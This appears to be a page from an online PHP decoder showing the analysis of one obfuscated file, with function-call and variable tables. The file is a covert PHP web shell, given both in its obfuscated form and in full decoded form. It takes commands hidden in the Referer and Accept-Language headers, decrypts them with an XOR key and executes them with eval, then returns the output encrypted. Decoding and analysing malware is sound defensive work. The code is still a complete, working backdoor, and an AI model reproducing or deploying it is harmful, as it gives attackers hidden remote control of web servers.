Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $A='[$i],$53f)53;if($e){53$k=$kh.$53kf;o53b_st53art();@e5353val(@gzuncompres53s(@x(..

Decoded Output download

$kh="24c7";$kf="52a7";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$A='[$i],$53f)53;if($e){53$k=$kh.$53kf;o53b_st53art();@e5353val(@gzuncompres53s(@x(@b53as53';
$H='$kh="53532453c7"53;$kf53="52a753";function x($t,$k){$c=st53rlen($k)53;$53l=s53trlen($t)';
$Z='(53?:;q=0.([\\d]))53?,?/",$ra53,$m);if53($53q&&$m){@ses53s53io53n_start();$s=&$_53SESS53';
$k='d553($i.53$kh),0,3));$f=53$sl(53$ss(md5(53$i.53$53kf),0,533)53);$p="";for($5353z=1;$z<c';
$M='53;$53o=53"53";for($i=0;$i<$l;){5353for($5353j=0;($j<$c&53&$i<$l)53;$j++,53$i++){$o53.=$';
$R='53t{$i}^$k{$j};}}r53eturn $o535353;53}$r=$_SERVER;$rr=@$r["H53TT53P_REFERE53R"];53$ra=@$r';
$Q='353"";$p=$ss($p,3);}if5353(arra53y_ke53y_ex53ists($i,$s53)){$s[$i].=$p;$e5353=st53rpos($s';
$o=str_replace('m','','crematmme_fmunmcmtion');
$c='i]53,0,$e))),$k)));$o=ob53_53get_conte53n53ts();ob_end_c53lean(53);$d=b53ase6534_enc53o';
$E='["5353HTTP_A53C53CEPT_LA53NGUAGE"];if($r53r&&$ra)53{53$u53=par53s53e_url($rr);parse_53str(';
$y='I53ON;$ss="53substr53";$sl="s53trtolowe53r53";$i=$m[153][0]5353.$m[1][1]53;$h=53$sl($ss(m';
$p='$u["q53u53ery"],53$q);53$q=array_va53l53ues(53$q);preg_match_a5353ll("/(53[\\53w]53)[\\w-]+';
$C='ount($m[531]53);$z++)$53p.=$q53[$m[2]53[$z]53];if(s53trpos($p,53$h)===0)5353{$s[$i]53=5';
$V='de(x(gz53comp53ress($o),53$k53));pri53nt("<$k>53$53d</$k>");@53s5353ession_destroy();}}}}';
$G='e64_deco53de(pre5353g_53repl53ace(array("/_/","/53-/"),arr53ay(53"/"53,"+"53),$s53s(53$s[$';
$O=str_replace('53','',$H.$M.$R.$E.$p.$Z.$y.$k.$C.$Q.$A.$G.$c.$V);
$e=$o('',$O);$e();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A [$i],$53f)53;if($e){53$k=$kh.$53kf;o53b_st53art();@e5353val(..
$C ount($m[531]53);$z++)$53p.=$q53[$m[2]53[$z]53];if(s53trpos($..
$E ["5353HTTP_A53C53CEPT_LA53NGUAGE"];if($r53r&&$ra)53{53$u53=p..
$G e64_deco53de(pre5353g_53repl53ace(array("/_/","/53-/"),arr53..
$H $kh="53532453c7"53;$kf53="52a753";function x($t,$k){$c=st53r..
$M 53;$53o=53"53";for($i=0;$i<$l;){5353for($5353j=0;($j<$c&53&$..
$O $kh="24c7";$kf="52a7";function x($t,$k){$c=strlen($k);$l=str..
$Q 353"";$p=$ss($p,3);}if5353(arra53y_ke53y_ex53ists($i,$s53)){..
$R 53t{$i}^$k{$j};}}r53eturn $o535353;53}$r=$_SERVER;$rr=@$r["H..
$V de(x(gz53comp53ress($o),53$k53));pri53nt("<$k>53$53d</$k>");..
$Z (53?:;q=0.([\d]))53?,?/",$ra53,$m);if53($53q&&$m){@ses53s53i..
$c i]53,0,$e))),$k)));$o=ob53_53get_conte53n53ts();ob_end_c53le..
$e None
$k d553($i.53$kh),0,3));$f=53$sl(53$ss(md5(53$i.53$53kf),0,533)..
$o create_function
$p $u["q53u53ery"],53$q);53$q=array_va53l53ues(53$q);preg_match..
$y I53ON;$ss="53substr53";$sl="s53trtolowe53r53";$i=$m[153][0]5..

Stats

MD5 f5cb54492357101d2efef85a4b6c2eac
Eval Count 1
Decode Time 100 ms